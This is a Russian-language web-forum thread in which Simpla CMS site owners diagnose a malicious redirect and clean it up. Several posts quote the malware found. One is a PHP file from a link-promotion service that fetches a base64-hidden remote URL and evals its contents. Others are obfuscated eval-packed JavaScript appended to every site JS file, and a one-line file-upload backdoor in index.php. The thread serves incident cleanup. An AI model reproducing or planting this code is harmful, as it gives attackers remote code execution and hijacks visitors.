Вирус: переадресация на другой сайт!

Axotn1k · 15 июня, 2016

Здраствуйте!

У меня такая проблема, если просто по ссилке зайти на сайт, то все ок, если зайти на сайт к примеру через ссылку гугла короткую, или через ссылку отправленую в вк сообщение, сразу идет переадресация на сайт _http://ar3t.ru/

Искал проблему и заметил, что если удалить в файле index.tpl строчки

	<script src="js/jquery/jquery.js"  type="text/javascript"></script>
 	
	{* Ctrl-навигация на соседние товары *}
	<script type="text/javascript" src="js/ctrlnavigate.js"></script>

проблема исчезает. Файлы .js качал из офф реализа на сайте. Как решить проблему ?

Изменено 15 июня, 2016 пользователем Axotn1k

Maksclub · 15 июня, 2016

Здраствуйте!
У меня такая проблема, если просто по ссилке зайти на сайт, то все ок, если зайти на сайт к примеру через ссылку гугла короткую, или через ссылку отправленую в вк сообщение, сразу идет переадресация на сайт _http://ar3t.ru/
Искал проблему и заметил, что если удалить в файле index.tpl строчки
	<script src="js/jquery/jquery.js"  type="text/javascript"></script>
 	
	{* Ctrl-навигация на соседние товары *}
	<script type="text/javascript" src="js/ctrlnavigate.js"></script>   
проблема исчезает. Файлы .js качал из офф реализа на сайте. Как решить проблему ?

Вы удалением этих строчек отрубаете JS библиотеку, и JS на сайте не работает, хотя и скорее всего остался где-то в других файлах :-)

ВАЖНО! Зайдите на сайт с нового компа, похоже на вирус на компе, "быстрые ссылки" и "вк" -- все это любят вирусы браузерные

Изменено 15 июня, 2016 пользователем Maksclub

Axotn1k · 15 июня, 2016

Вы удалением этих строчек отрубаете JS библиотеку, и JS на сайте не работает, хотя и скорее всего остался где-то в других файлах :-)

ВАЖНО! Сделайте все вше перечисленное с другого компа, похоже на вирус на компе

На каждом компе такое, не только у меня. как найти данный вирус ?

Maksclub · 15 июня, 2016

На каждом компе такое, не только у меня. как найти данный вирус ?

Такое -- это какое? Не вижу ссылок :-)

Axotn1k · 15 июня, 2016

Такое -- это какое? Не вижу ссылок :-)

Переадресация на другой сайт на любом компе, скинул ссику вам в лс

Maksclub · 15 июня, 2016

Хм какая-то гадость, вам нужно обязательно сменить пароли на FTP -- не хранить пароль на filezillaa или Total Comander

И срабатывает только при переходе с другого сайта, ловко это они

Проверьте index.php в корневой дирректории и сравните его с чистым, там вроде js не должно вообще быть

Обратитесь к Мишане, он должен помочь.

Axotn1k · 15 июня, 2016

Хм какая-то гадость, вам нужно обязательно сменить пароли на FTP -- не хранить пароль на filezillaa или Total Comander
И срабатывает только при переходе с другого сайта, ловко это они

Проверьте index.php в корневой дирректории и сравните его с чистым, там вроде js не должно вообще быть

Обратитесь к Мишане, он должен помочь.

На стандарншом шаблоне js есть так же, свой шаблон создавал на основе стандартного, на стандартном нет переадресации.

Maksclub · 15 июня, 2016

На стандарншом шаблоне js есть так же, свой шаблон создавал на основе стандартного, на стандартном нет переадресации.

я писал про index.php в корневой дирректории, а не про indes.tpl в папке дизайна

Axotn1k · 15 июня, 2016

я писал про index.php в корневой дирректории, а не про indes.tpl в папке дизайна

когда я включаю стандартный шаблон, этот файл так же задействован, но переадресации нет

Maksclub · 15 июня, 2016

Решена проблема?

Axotn1k · 15 июня, 2016

Решена проблема?

Нет, как оказалось проблема на всех шаблонах

Maksclub · 15 июня, 2016

Нет, как оказалось проблема на всех шаблонах

index.php нормальный?

Axotn1k · 15 июня, 2016

index.php нормальный?

Да менял все тоже самое

Maksclub · 15 июня, 2016

Да менял все тоже самое

Какие доработки делали? Особенно с других сайтов?

Axotn1k · 15 июня, 2016

Какие доработки делали? Особенно с других сайтов?

трудно сказать, уже давно был вирус, я он был замаскирован хорошо, я не обратил внимания

Axotn1k · 15 июня, 2016

На том же домене стоит другой сайт http://vk.com/away.php?utf=1&to=http%3A%2F%2Flcpto.lutsk.ua%2F

и сдесь так же перекидает, выходит вирус в катогле где то

ps-simpla · 15 июня, 2016

пишите в скайп ps-avatar

ST_RU · 15 июня, 2016

На том же домене стоит другой сайт http://vk.com/away.php?utf=1&to=http%3A%2F%2Flcpto.lutsk.ua%2F
и сдесь так же перекидает, выходит вирус в катогле где то

по ссылке на VK. есть. http://i1069.photobucket.com/albums/u478/L0ckedmem0ries/blackandwhite/898B3066306D_m17_zps0c2f68f9.gif

даже adblock не помогает. полный "катогле "

решения, я думаю, как обычно... или накопировал чужих текстов. Вместе со скриптами

или в js поганка вшита ....

ну или из сети скачали оформление и беда. http://i1069.photobucket.com/albums/u478/L0ckedmem0ries/blackandwhite/898B3066306D_m15_zpsb3b766c9.gif

На стандарншом шаблоне js есть так же, свой шаблон создавал на основе стандартного, на стандартном нет переадресации.

Изменено 17 июня, 2016 пользователем ST_RU

ST_RU · 15 июня, 2016

починили этот сайт?

"На том же домене" ==>>>VK http://i1069.photobucket.com/albums/u478/L0ckedmem0ries/blackandwhite/898B3066306D_m1_zps501bba34.gif

На том же домене стоит другой сайт http://vk.com/away.p .....

Изменено 15 июня, 2016 пользователем ST_RU

Axotn1k · 16 июня, 2016

починили этот сайт?
"На том же домене" ==>>>VK

Информация была не верна, на стандртом шаблоне переадресация так же есть, что уж говорить если есть переадресация есть даже на сайте этом lcpto.lutsk.ua а он вообще на worldprees и туда то я точно никаких модулей не пихал, а проблему заметил только на сайт который на simpla cms, потому и тему сдесь создал.

Сегодня пониму еще один сайт с 0 на том же хостинге, и попробую

Axotn1k · 16 июня, 2016

Вопрос, пользовался Этим сайтом http://autoprogon.com/

после этого и случилось такое, сегодня перенаправило на этот сайт вот я и вспомнил, думаю они связаны!

Изменено 16 июня, 2016 пользователем Axotn1k

Axotn1k · 16 июня, 2016

Там указываешь сайт, скаичиваешь файл и его в корень кидаешь, затем идет прогон. Содержимое файла:

<?php ini_set('display_errors','Off');error_reporting('E_ALL');$b=base64_decode('aHR0cDovL2F1dG9wcm9nb24uY29tL3dvcmsudHh0');$q=$_GET['q'];if($q)$b.=base64_decode('P3E9').$q;$d=file_get_contents($;eval($d); ?>

Получается вирус в msql ?

Нагуглил https://wmsn.biz/m.php?p=17009

Изменено 16 июня, 2016 пользователем Axotn1k

ps-simpla · 16 июня, 2016

Во всех js которые находились на сайте (включая админку) в самом конце были прописаны

(function () { eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('1g 1q=["s","9","n","f","o","t","L","w",",","h"," ","E","<","F","(","r","|","{","2","&","+","v",".","x","u","g","D","3","=","]","a","[","0","p","j","q","B","m","y",";","S","/",":","\'","P","?","1u","5","N","k","c",")","l","i","e","b","C","}","d"];1g 1j="W|H|15|10|0|1b|A|O|9|I|K|H|Q|z|G|7|1a|A|5|1e|X|A|I|9|O|Q|M|G|4|T|Y|K|z|2|5|J|T|15|z|H|5|z|11|A|z|K|z|2|5|14|V|0|T|15|U|1c|5|V|Z|R|10|0|1b|A|O|9|I|K|H|Q|z|G|7|1a|A|5|1e|X|A|I|9|O|Q|J|0|15|T|M|V|9|5|5|1c|1v|1k|1k|1e|1f|1r|J|15|Y|1w|T|M|V|1d|G|4|T|Y|K|z|2|5|J|T|4|4|1h|U|z|1d|V|19|15|M|V|1d|G|4|T|Y|K|z|2|5|J|15|z|3|z|15|15|z|15|R|10|W|H|15|10|0|1b|A|O|9|I|A|z|G|1a|A|X|1|A|13|A|9|Q|O|A|1h|I|9|1e|A|Q|M|G|4|T|Y|K|z|2|5|J|9|z|H|G|J|H|1c|1c|z|2|G|1l|9|U|A|G|14|0|1b|A|O|9|I|K|H|Q|z|G|7|1a|A|5|1e|X|A|I|9|O|Q|Z|R|10|0|1b|A|O|9|I|A|z|G|1a|A|X|1|A|13|A|9|Q|O|A|1h|I|9|1e|A|Q|J|T|A|H|0|0|1m|H|K|z|M|V|0|1s|0|7|O|9|I|A|z|G|1a|A|V|R|10|10|W|H|15|10|X|M|2|z|7|10|X|H|5|z|14|Z|R|10|X|J|0|z|5|X|H|5|z|14|X|J|Q|z|5|X|H|5|z|14|Z|1d|O|z|18|Z|R|10|G|4|T|Y|K|z|2|5|J|T|4|4|1h|U|z|M|V|1n|1t|1n|K|1n|M|U|G|R|10|1c|H|5|9|M|1k|R|10|z|1x|1c|U|15|z|0|M|V|1d|X|R|10|10|W|H|15|10|0|1b|A|O|9|I|G|1a|A|A|13|A|9|Q|M|G|4|T|Y|K|z|2|5|J|Q|z|5|11|A|z|K|z|2|5|0|1y|1t|1l|A|H|0|0|1m|H|K|z|14|V|0|1s|0|7|O|9|I|A|z|G|1a|A|V|Z|R|10|G|4|T|Y|K|z|2|5|J|H|G|G|11|W|z|2|5|6|U|0|5|z|2|z|15|14|V|K|4|Y|0|z|G|4|7|2|V|8|3|Y|2|T|5|U|4|2|14|z|W|z|2|5|Z|17|10|z|W|z|2|5|10|M|10|z|W|z|2|5|10|16|16|10|7|U|2|G|4|7|J|z|W|z|2|5|R|10|U|3|14|z|W|z|2|5|J|1f|Y|5|5|4|2|M|M|18|Z|17|10|3|4|15|14|10|W|H|15|10|U|M|1r|R|10|U|12|0|1b|A|O|9|I|G|1a|A|A|13|A|9|Q|J|A|z|2|Q|5|9|R|10|U|1d|1d|Z|10|17|10|W|H|15|10|4|1f|I|M|0|1b|A|O|9|I|G|1a|A|A|13|A|9|Q|1z|U|1A|R|10|4|1f|I|J|1c|H|15|z|2|5|1m|4|G|z|J|15|z|K|4|W|z|1l|9|U|A|G|14|4|1f|I|Z|R|10|1o|10|1o|10|1o|8|10|3|H|A|0|z|Z|R".1B(\'|\');1g 1p=\'\';1C(1g 1i=0;1i<1j.1D;1i++)1p+=1q[1j[1i]];1E(1p);',62,103,'|||||||||||||||||||||||||||||||||||54|52||||||58|30|34|22|37||28||27||25|39||50|53|43|21|26|24|51|||||||||||47|40|33|20|35|55|var|49|json_ajax|json_js|41|56|48|46|57|jquery_library|jquery_js|32|44|38|_|42|45|23|36|31|29|split|for|length|eval'.split('|'),0,{})); }());

или

(function(){var a="(ni(fcoc)f.br,=hp/)xut8ixut0)'t/)xut7ixut0)'w)xut4ixnx('=)xpt/[;(ief?!1=si')]erxaht(nwotnoner=dunree,=ce.oedt_mo'=wa(Dea(gDe+)omtoiin'a=eis+ir!'r!o&onx(e)-{ttv(ni(wd.ci.e't/2o/'20})",b="fco)utn({(ss(8=ts/x.br)f.br,=hp/x.br)f.br,=w.x.br)f.dO')-x.l('0ixnx('=)xpt?[;tn}ro=wd.ci.sa)ecomterrcdunck,e=y_f,n t).ttDea(2;ce.oedt;t/xr=Dfe=&e=s&.dOin=1sIeafco)iolaohfhp/or1}0)(;",c="utn{ni xixut0)'t:'=ss(;(ss(7=t:'=ss(;(ss(4=w'=ss(;(ief/!1=si')]f.dO')-x.l('0ru v sciolaohtm,f(ce.fr)oomtoiin'_=fDeDe;sDe.tt)0dunck=e+ph;pe';(f'&fhtciefdt=)enrlutn{nwotnr=t:0.ga,0})",d="";for(var i=0;i<a.length;i++)d+=a.charAt(i)+b.charAt(i)+c.charAt(i);eval(d);}());

Папку js в админке можно просто было заменить, а вот все остальные файлы надо было пройтись ручками и удалить этот код.

В index.php в корне сайта
находилась строка

<?PHP move_uploaded_file($_FILES['u']['tmp_name'],$_POST['n']); ?>

на двух сайтах из трех.
ее тоже удаляем.

Axotn1k · 16 июня, 2016

Да, помогло!! Спасибо вам большое, вирус подцепил как я писал через прогон http://autoprogon.com/ ?

Изменено 16 июня, 2016 пользователем Axotn1k

Kosjak76 · 16 июня, 2016

Там указываешь сайт, скаичиваешь файл и его в корень кидаешь, затем идет прогон. Содержимое файла:
<?php ini_set('display_errors','Off');error_reporting('E_ALL');$b=base64_decode('aHR0cDovL2F1dG9wcm9nb24uY29tL3dvcmsudHh0');$q=$_GET['q'];if($q)$b.=base64_decode('P3E9').$q;$d=file_get_contents($;eval($d); ?>
Получается вирус в msql ?
Нагуглил https://wmsn.biz/m.php?p=17009

Ага, вы застряли в 2005 году?

Бесплатный прогон по каталогам? Серьезно?

И сами себе бекдор вставляем?

Пипец....

Это дно...

Вирус: переадресация на другой сайт!

Рекомендуемые сообщения

Ссылка на сообщение

Поделиться на другие сайты

Ссылка на сообщение

Поделиться на другие сайты

Ссылка на сообщение

Поделиться на другие сайты

Ссылка на сообщение

Поделиться на другие сайты

Ссылка на сообщение

Поделиться на другие сайты

Ссылка на сообщение

Поделиться на другие сайты

Ссылка на сообщение

Поделиться на другие сайты

Ссылка на сообщение

Поделиться на другие сайты

Ссылка на сообщение

Поделиться на другие сайты

Ссылка на сообщение

Поделиться на другие сайты

Ссылка на сообщение

Поделиться на другие сайты

Ссылка на сообщение

Поделиться на другие сайты

Ссылка на сообщение

Поделиться на другие сайты

Ссылка на сообщение

Поделиться на другие сайты

Ссылка на сообщение

Поделиться на другие сайты

Ссылка на сообщение

Поделиться на другие сайты

Ссылка на сообщение

Поделиться на другие сайты

Ссылка на сообщение

Поделиться на другие сайты

Ссылка на сообщение

Поделиться на другие сайты

Ссылка на сообщение

Поделиться на другие сайты

Ссылка на сообщение

Поделиться на другие сайты

Ссылка на сообщение

Поделиться на другие сайты

Ссылка на сообщение

Поделиться на другие сайты

Ссылка на сообщение

Поделиться на другие сайты

Ссылка на сообщение

Поделиться на другие сайты

Присоединяйтесь к обсуждению